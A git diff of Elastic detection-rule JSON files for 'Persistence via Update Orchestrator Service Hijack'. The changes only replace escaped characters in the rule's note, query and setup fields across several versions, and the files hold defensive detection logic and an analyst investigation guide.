!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json index 59b70f4c062..4a25cc003e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json index 668020c5f1a..48dc62537f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json index e4509d9c2e9..80935de7433 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. 